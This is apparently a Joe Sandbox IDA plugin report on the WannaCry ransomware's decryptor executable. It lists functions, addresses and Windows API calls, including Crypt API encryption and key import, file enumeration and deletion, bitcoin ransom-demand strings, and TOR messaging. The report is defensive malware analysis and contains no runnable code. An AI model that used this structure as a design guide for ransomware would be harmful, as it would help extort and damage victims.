    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 00411660, Relevance: 3.9, APIs: 3, Instructions: 156
    APIs
    • free.MSVCRT(00000000,?,?,?,?,?,?,?,00000000), ref: 00411707
      • Part of subcall function 00411AC0: free.MSVCRT(?,?,?,?,00411D27,?,?,?,00000000), ref: 00411B03
      • Part of subcall function 00411AC0: free.MSVCRT(?,?,?,?,00411D27,?,?,?,00000000), ref: 00411B32
    • malloc.MSVCRT ref: 004116C8
    • malloc.MSVCRT ref: 004116E7
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 004133E6, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 6
    APIs
    • #1576.MFC42(?,?,?,62A,00413236,00000000,?,0000000A), ref: 004133F6
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 00410A50, Relevance: 3.1, APIs: 2, Instructions: 65
    APIs
    • SetFilePointer.KERNELBASE(?,?,00000000,00000000,00410CA4,?,00000000,00000002,00000000,?,00000000,FFFFFFFF,?), ref: 00410A79
    • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00410CA4,?,00000000,00000002,00000000,?,00000000,FFFFFFFF,?), ref: 00410A9B
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 004102B0, Relevance: 1.3, APIs: 1, Instructions: 7
    APIs
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd

    Non-executed Functions

    Function 00406F80, Relevance: 130.0, APIs: 67, Strings: 7, Instructions: 536
    APIs
      • Part of subcall function 004076A0: time.MSVCRT ref: 004076DA
      • Part of subcall function 004076A0: sprintf.MSVCRT ref: 0040780E
      • Part of subcall function 004076A0: SendMessageA.USER32(?,00000402,?,00000000), ref: 0040785B
      • Part of subcall function 004076A0: SendMessageA.USER32(?,00000402,?,00000000), ref: 00407870
      • Part of subcall function 004076A0: #540.MFC42 ref: 00407876
      • Part of subcall function 004076A0: _ftol.MSVCRT ref: 004078AA
      • Part of subcall function 004076A0: #2818.MFC42(?,$%d,00000000), ref: 004078BE
      • Part of subcall function 004076A0: #2818.MFC42(?,Send $%d worth of bitcoin to this address:,00000000), ref: 004078D1
      • Part of subcall function 004076A0: #2818.MFC42(?,%.1f BTC,?,?), ref: 004078F5
      • Part of subcall function 004076A0: #2818.MFC42(?,Send %.1f BTC to this address:,?,?), ref: 00407909
      • Part of subcall function 004076A0: #3092.MFC42(00000402,?), ref: 0040791D
      • Part of subcall function 004076A0: #6199.MFC42(00000402,?), ref: 00407924
      • Part of subcall function 004076A0: InvalidateRect.USER32(?,00000000,00000001), ref: 0040795A
      • Part of subcall function 004076A0: #800.MFC42 ref: 0040799F
    • CreateSolidBrush.GDI32(000000E0), ref: 00406FB3
    • #1641.MFC42(00000000,?,767AAD28,?), ref: 00406FBC
    • CreateSolidBrush.GDI32(00121284), ref: 00406FC6
    • #1641.MFC42(00000000,?,767AAD28,?), ref: 00406FCF
    • CreateSolidBrush.GDI32(0000E000), ref: 00406FD9
    • #1641.MFC42(00000000,?,767AAD28,?), ref: 00406FE2
    • CreateSolidBrush.GDI32(00E00000), ref: 00406FEC
    • #1641.MFC42(00000000,?,767AAD28,?), ref: 00406FF5
    • CreateSolidBrush.GDI32(00000000), ref: 00406FFC
    • #1641.MFC42(00000000,?,767AAD28,?), ref: 00407005
    • CreateSolidBrush.GDI32(003834D1), ref: 0040700F
    • #1641.MFC42(00000000,?,767AAD28,?), ref: 00407018
    • CreateSolidBrush.GDI32(00107C10), ref: 00407022
    • #1641.MFC42(00000000,?,767AAD28,?), ref: 0040702B
    • CreateSolidBrush.GDI32(00E8A200), ref: 00407035
    • #1641.MFC42(00000000,?,767AAD28,?), ref: 0040703E
    • CreateSolidBrush.GDI32(00D77800), ref: 00407048
    • #1641.MFC42(00000000,?,767AAD28,?), ref: 00407051
    • CreateSolidBrush.GDI32(00003CDA), ref: 0040705B
    • #1641.MFC42(00000000,?,767AAD28,?), ref: 00407064
    • CreateFontA.GDI32(00000018,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000020,Arial), ref: 00407097
    • #1641.MFC42(00000000,?,767AAD28,?), ref: 0040709C
    • CreateFontA.GDI32(00000012,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000020,Arial), ref: 004070C9
    • #1641.MFC42(00000000,?,767AAD28,?), ref: 004070CE
    • CreateFontA.GDI32(00000010,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000020,Arial), ref: 004070FB
    • #1641.MFC42(00000000,?,767AAD28,?), ref: 00407104
    • #3092.MFC42(000003ED,00000000,?,767AAD28,?), ref: 00407110
    • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040712B
    • #3092.MFC42(000003FE,?,767AAD28,?), ref: 00407134
    • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040714D
    • #3092.MFC42(000003FB,?,767AAD28,?), ref: 00407156
    • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040716F
    • #3092.MFC42(000003FF,?,767AAD28,?), ref: 00407178
    • SendMessageA.USER32(?,00000030,?,00000001), ref: 00407191
    • #3092.MFC42(000003FC,?,767AAD28,?), ref: 0040719A
    • SendMessageA.USER32(?,00000030,?,00000001), ref: 004071B3
    • #3092.MFC42(00000400,?,767AAD28,?), ref: 004071BC
    • SendMessageA.USER32(?,00000030,?,00000001), ref: 004071D5
    • #3092.MFC42(000003FA,?,767AAD28,?), ref: 004071DE
    • SendMessageA.USER32(?,00000030,?,00000001), ref: 004071F3
    • #3092.MFC42(00000402,?,767AAD28,?), ref: 004071FC
    • SendMessageA.USER32(?,00000030,?,00000001), ref: 00407215
    • #3092.MFC42(000003EF,?,767AAD28,?), ref: 0040721E
    • SendMessageA.USER32(?,00000030,?,00000001), ref: 00407237
    • #3092.MFC42(000003EB,?,767AAD28,?), ref: 00407240
    • SendMessageA.USER32(?,00000030,?,00000001), ref: 00407259
    • #3092.MFC42(000003EC,?,767AAD28,?), ref: 00407262
    • SendMessageA.USER32(?,00000030,?,00000001), ref: 00407277
    • #860.MFC42(?,?,767AAD28,?), ref: 00407288
    • #537.MFC42(https://en.wikipedia.org/wiki/Bitcoin,?,?,?,767AAD28,?), ref: 004072F9
      • Part of subcall function 00404210: #858.MFC42(?,?,00413788,000000FF), ref: 00404235
      • Part of subcall function 00404210: #800.MFC42(?,?,00413788,000000FF), ref: 00404246
    • #537.MFC42(https://www.google.com/search?q=how+to+buy+bitcoin,?,?,?,?,767AAD28,?), ref: 00407315
    • #540.MFC42(?,?,?,?,767AAD28,?), ref: 00407329
    • #2818.MFC42(?,mailto:%s,?,?,?,?,?,767AAD28,?), ref: 0040734A
    • #535.MFC42(?), ref: 0040735D
    • #2818.MFC42(?,http://www.btcfrog.com/qr/bitcoinPNG.php?address=%s,00000000), ref: 00407385
    • #535.MFC42(?), ref: 00407398
    • SendMessageA.USER32(?,00000406,00000000,00000064), ref: 004073B8
    • SendMessageA.USER32(?,00000406,00000000,00000064), ref: 004073CA
    • #6140.MFC42(00000002,000000FF), ref: 004073D6
    • #6140.MFC42(00000002,000000FF,00000002,000000FF), ref: 004073FF
      • Part of subcall function 00405860: GetClientRect.USER32(?,?), ref: 0040587E
      • Part of subcall function 00405860: #6197.MFC42(00000000,00000000,00000000,?,?,00000002), ref: 004058A5
      • Part of subcall function 004058C0: GetClientRect.USER32(?,?), ref: 004058DE
      • Part of subcall function 004058C0: #6197.MFC42(00000000,00000000,00000000,?,?,00000002), ref: 00405905
      • Part of subcall function 00405180: _mbscmp.MSVCRT ref: 00405191
      • Part of subcall function 00405180: #860.MFC42(?), ref: 004051A1
      • Part of subcall function 00405180: RedrawWindow.USER32(?,00000000,00000000,00000121), ref: 004051DE
      • Part of subcall function 00405180: InvalidateRect.USER32(?,00000000,00000001), ref: 004051F2
    • GetTimeZoneInformation.KERNEL32(?,0000000B,00000001,0000000B,00000001,00000002,000000FF,00000002,000000FF), ref: 004074DA
      • Part of subcall function 00401E60: VariantTimeToSystemTime.OLEAUT32(?), ref: 00401E7B
    • SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?), ref: 00407520
    • #2818.MFC42(?,%d/%d/%d %02d:%02d:%02d,?,?,?,?,?,?), ref: 0040756E
    • SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?), ref: 004075AD
    • #2818.MFC42(?,%d/%d/%d %02d:%02d:%02d,?,?,?,?,?,?), ref: 004075FB
    • #6334.MFC42(00000000), ref: 00407607
    • #800.MFC42 ref: 0040761B
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 004026B0, Relevance: 54.6, APIs: 26, Strings: 5, Instructions: 318
    APIs
      • Part of subcall function 0040C8F0: #823.MFC42(00000018,0040BB62,00000000,00000000), ref: 0040C8F2
    • swprintf.MSVCRT ref: 00402728
    • FindFirstFileW.KERNEL32(?,?,00000000), ref: 0040273E
    • wcscmp.MSVCRT ref: 004027E1
    • wcscmp.MSVCRT ref: 004027FB
    • swprintf.MSVCRT(?,%s\%s,?,?), ref: 00402822
    • GetFileAttributesW.KERNEL32(?), ref: 00402830
    • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 00402957
      • Part of subcall function 00402AF0: _wcsnicmp.MSVCRT ref: 00402AFF
      • Part of subcall function 00402AF0: wcsstr.MSVCRT ref: 00402B18
      • Part of subcall function 00402AF0: _wcsicmp.MSVCRT ref: 00402B39
      • Part of subcall function 00402AF0: _wcsicmp.MSVCRT ref: 00402B53
      • Part of subcall function 00402AF0: _wcsicmp.MSVCRT ref: 00402B6D
      • Part of subcall function 00402AF0: _wcsicmp.MSVCRT ref: 00402B87
      • Part of subcall function 00402AF0: _wcsicmp.MSVCRT ref: 00402BA1
      • Part of subcall function 00402AF0: wcsstr.MSVCRT ref: 00402BBB
      • Part of subcall function 00402AF0: wcsstr.MSVCRT ref: 00402BD5
      • Part of subcall function 00402AF0: _wcsicmp.MSVCRT ref: 00402BF3
      • Part of subcall function 00402AF0: _wcsicmp.MSVCRT ref: 00402C0D
      • Part of subcall function 00402AF0: _wcsicmp.MSVCRT ref: 00402C27
    • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000000,?,?), ref: 00402863
    • wcslen.MSVCRT ref: 0040286E
    • ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z.MSVCP60(?,00000000), ref: 0040287D
    • wcscmp.MSVCRT ref: 004028C3
    • wcscmp.MSVCRT ref: 004028DD
    • wcscmp.MSVCRT ref: 004028F3
    • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000000), ref: 00402909
    • wcslen.MSVCRT ref: 00402914
    • ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z.MSVCP60(?,00000000), ref: 00402923
      • Part of subcall function 00402DA0: #823.MFC42(00000018,768ED335,768ED3B7,?,00000000,00402949), ref: 00402DAF
    • FindNextFileW.KERNEL32(?,?), ref: 0040296A
    • FindClose.KERNEL32(?), ref: 0040297D
      • Part of subcall function 00402560: wcscpy.MSVCRT ref: 0040257D
      • Part of subcall function 00402560: wcsrchr.MSVCRT ref: 0040258A
      • Part of subcall function 00402560: _wcsicmp.MSVCRT ref: 004025A5
      • Part of subcall function 00402560: _wcsicmp.MSVCRT ref: 004025B4
      • Part of subcall function 00402560: wcscat.MSVCRT ref: 004025D3
      • Part of subcall function 00402560: DeleteFileW.KERNEL32(?), ref: 004025F0
      • Part of subcall function 00402560: MoveFileW.KERNEL32(?,?), ref: 00402604
      • Part of subcall function 00402560: DeleteFileW.KERNEL32(?), ref: 0040262E
      • Part of subcall function 004026B0: #825.MFC42(?,?,?,?), ref: 0040276F
      • Part of subcall function 004026B0: #825.MFC42(?), ref: 004027A5
    • swprintf.MSVCRT(?,%s\%s,?,@Please_Read_Me@.txt), ref: 00402A0C
    • DeleteFileW.KERNEL32(?), ref: 00402A16
    • swprintf.MSVCRT(?,%s\%s,?,@WanaDecryptor@.exe.lnk), ref: 00402A2C
    • DeleteFileW.KERNEL32(?), ref: 00402A36
    • #825.MFC42(?), ref: 00402A6B
    • #825.MFC42(?), ref: 00402ABF
      • Part of subcall function 00402E90: #825.MFC42(?,?,?,?,00402AB4,?,?,?,00000000), ref: 00402EC8
      • Part of subcall function 00402E90: #825.MFC42(?,?,?,?,00402AB4,?,?,?,00000000), ref: 00402EE6
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 004035A0, Relevance: 36.2, APIs: 24, Instructions: 175
    APIs
    • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004035DB
    • OpenClipboard.USER32(?), ref: 004035E9
    • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00403609
    • #3301.MFC42(?,00000000,00000000), ref: 0040361A
    • #924.MFC42 ref: 00403635
    • #800.MFC42 ref: 00403646
    • #800.MFC42 ref: 00403665
    • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040367B
    • GlobalAlloc.KERNEL32(00000002,-00000002), ref: 00403687
    • GlobalLock.KERNEL32(00000000), ref: 0040369C
    • GlobalFree.KERNEL32(00000000), ref: 004036AB
    • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004036C8
    • #3301.MFC42(?,00000000,00000000), ref: 004036E7
    • #924.MFC42(00000000), ref: 00403702
    • #800.MFC42(00000000), ref: 00403713
    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000167,00000000), ref: 00403748
    • wcslen.MSVCRT ref: 00403753
    • wcslen.MSVCRT ref: 0040377B
    • #800.MFC42 ref: 00403797
    • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004037B1
    • GlobalUnlock.KERNEL32(00000000), ref: 004037CE
    • EmptyClipboard.USER32 ref: 004037D4
    • SetClipboardData.USER32(0000000D,00000000), ref: 004037DD
    • CloseClipboard.USER32 ref: 004037E3
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 00403CB0, Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 122
    APIs
    • FindFirstFileA.KERNEL32(*.res,?), ref: 00403CCA
    • sscanf.MSVCRT ref: 00403D26
    • fopen.MSVCRT ref: 00403D45
    • fread.MSVCRT ref: 00403D69
    • sprintf.MSVCRT ref: 00403D99
      • Part of subcall function 00401C30: inet_ntoa.WS2_32(?), ref: 00401C3F
    • SendMessageA.USER32(?,00000143,00000000,?), ref: 00403DDB
    • #823.MFC42(00000088), ref: 00403DE4
    • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00403E0B
    • fclose.MSVCRT ref: 00403E16
    • FindNextFileA.KERNEL32(?,00000010), ref: 00403E2C
    • FindClose.KERNEL32(?), ref: 00403E3B
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 00404B70, Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 62
    APIs
    • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00404B86
    • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,00402C46), ref: 00404BA3
    • GetProcAddress.KERNEL32(00000000,CryptImportKey,?,?,00402C46), ref: 00404BB0
    • GetProcAddress.KERNEL32(00000000,CryptDestroyKey,?,?,00402C46), ref: 00404BBD
    • GetProcAddress.KERNEL32(00000000,CryptEncrypt,?,?,00402C46), ref: 00404BCA
    • GetProcAddress.KERNEL32(00000000,CryptDecrypt,?,?,00402C46), ref: 00404BD7
    • GetProcAddress.KERNEL32(00000000,CryptGenKey,?,?,00402C46), ref: 00404BE4
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 004080C0, Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 143
    APIs
    • FindFirstFileA.KERNEL32(*.res,?), ref: 00408111
    • sscanf.MSVCRT ref: 0040816A
    • fopen.MSVCRT ref: 00408185
    • fread.MSVCRT ref: 004081A0
    • fclose.MSVCRT ref: 004081BE
    • FindNextFileA.KERNEL32(?,00000010), ref: 004081F1
    • FindClose.KERNEL32(?), ref: 00408200
    • sprintf.MSVCRT ref: 00408266
    • #537.MFC42(?,?,00000000), ref: 00408280
      • Part of subcall function 004082C0: #4278.MFC42(000003E8,00000000,000003E8,?,?,76923ABC), ref: 0040830D
      • Part of subcall function 004082C0: #858.MFC42 ref: 00408322
      • Part of subcall function 004082C0: #800.MFC42 ref: 00408332
      • Part of subcall function 004082C0: #1200.MFC42(Too short message!,00000000,00000000,?,?,76923ABC), ref: 00408354
      • Part of subcall function 004082C0: #800.MFC42 ref: 0040836B
      • Part of subcall function 004082C0: time.MSVCRT ref: 0040837F
      • Part of subcall function 004082C0: #540.MFC42 ref: 004083C8
      • Part of subcall function 004082C0: time.MSVCRT ref: 004083D6
      • Part of subcall function 004082C0: #2818.MFC42(?,You are sending too many mails! Please try again %d minutes later.,0000003D,00000000), ref: 0040840A
      • Part of subcall function 004082C0: #1200.MFC42(?,00000000,00000000,?,?,?,00000000), ref: 00408419
      • Part of subcall function 004082C0: #800.MFC42(?,00000000,00000000,?,?,?,00000000), ref: 00408429
      • Part of subcall function 004082C0: #800.MFC42 ref: 00408440
      • Part of subcall function 004082C0: time.MSVCRT ref: 0040844E
      • Part of subcall function 004082C0: fopen.MSVCRT ref: 00408487
      • Part of subcall function 004082C0: #800.MFC42 ref: 004084A8
      • Part of subcall function 004082C0: fread.MSVCRT ref: 004084C2
      • Part of subcall function 004082C0: fclose.MSVCRT ref: 004084C9
      • Part of subcall function 004082C0: #1200.MFC42(Your message has been sent successfully!,00000040,00000000), ref: 00408522
      • Part of subcall function 004082C0: time.MSVCRT ref: 00408528
      • Part of subcall function 004082C0: #1200.MFC42(Failed to send your message!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!,00000030,00000000), ref: 00408544
      • Part of subcall function 004082C0: #800.MFC42 ref: 0040855B
    • #537.MFC42(?,?,00000000,?,?,00000000), ref: 004082A2
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 0040D6A0, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120
    APIs
    • htons.WS2_32 ref: 0040D6C7
    • socket.WS2_32(00000002,00000001,00000006), ref: 0040D6E1
    • bind.WS2_32(00000000,?,00000010), ref: 0040D709
    • ioctlsocket.WS2_32(00000000,8004667E,?), ref: 0040D728
    • connect.WS2_32(00000000,?,00000010), ref: 0040D73A
    • select.WS2_32(00000001,?,?,00000000,00000001), ref: 0040D781
    • __WSAFDIsSet.WS2_32(00000000,?), ref: 0040D791
    • __WSAFDIsSet.WS2_32(00000000,?), ref: 0040D7A3
    • ioctlsocket.WS2_32(00000000,8004667E,?), ref: 0040D7BB
    • setsockopt.WS2_32(00000000), ref: 0040D7DD
    • setsockopt.WS2_32(00000000,0000FFFF,00001005,?,00000004), ref: 0040D7F1
    • closesocket.WS2_32(00000000), ref: 0040D80E
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 00407E80, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 67
    APIs
    • SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,?), ref: 00407EE6
    • wcslen.MSVCRT ref: 00407EF4
    • swprintf.MSVCRT(?,%s\%s,?,@WanaDecryptor@.bmp), ref: 00407F20
    • MultiByteToWideChar.KERNEL32(00000000,00000000,b.wnry,000000FF,?,00000103), ref: 00407F41
    • CopyFileW.KERNEL32(?,?,00000000), ref: 00407F56
    • SystemParametersInfoW.USER32(00000014,00000000,?,00000001), ref: 00407F67
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 004067F0, Relevance: 13.6, APIs: 9, Instructions: 71
    APIs
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 004047C0, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 154
    APIs
      • Part of subcall function 004046B0: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,0040484E), ref: 004046CD
      • Part of subcall function 004049B0: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004049F5
      • Part of subcall function 004049B0: GetFileSize.KERNEL32(00000000,00000000), ref: 00404A0B
      • Part of subcall function 004049B0: GlobalAlloc.KERNEL32(00000000,00000000), ref: 00404A3A
      • Part of subcall function 004049B0: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00404A52
      • Part of subcall function 004049B0: CryptImportKey.ADVAPI32(?,00000000,?,00000000,00000000,?), ref: 00404A75
      • Part of subcall function 004049B0: _local_unwind2.MSVCRT ref: 00404A85
      • Part of subcall function 004049B0: _local_unwind2.MSVCRT ref: 00404AC7
    • CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,?,00000200), ref: 004048DB
    • _local_unwind2.MSVCRT ref: 004048EB
    • CryptDecrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,?), ref: 00404920
    • strncmp.MSVCRT(00000000,?), ref: 00404951
    • _local_unwind2.MSVCRT ref: 00404964
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 004049B0, Relevance: 10.6, APIs: 7, Instructions: 107
    APIs
    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004049F5
    • GetFileSize.KERNEL32(00000000,00000000), ref: 00404A0B
    • GlobalAlloc.KERNEL32(00000000,00000000), ref: 00404A3A
    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00404A52
    • CryptImportKey.ADVAPI32(?,00000000,?,00000000,00000000,?), ref: 00404A75
    • _local_unwind2.MSVCRT ref: 00404A85
    • _local_unwind2.MSVCRT ref: 00404AC7
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 00406C20, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 72
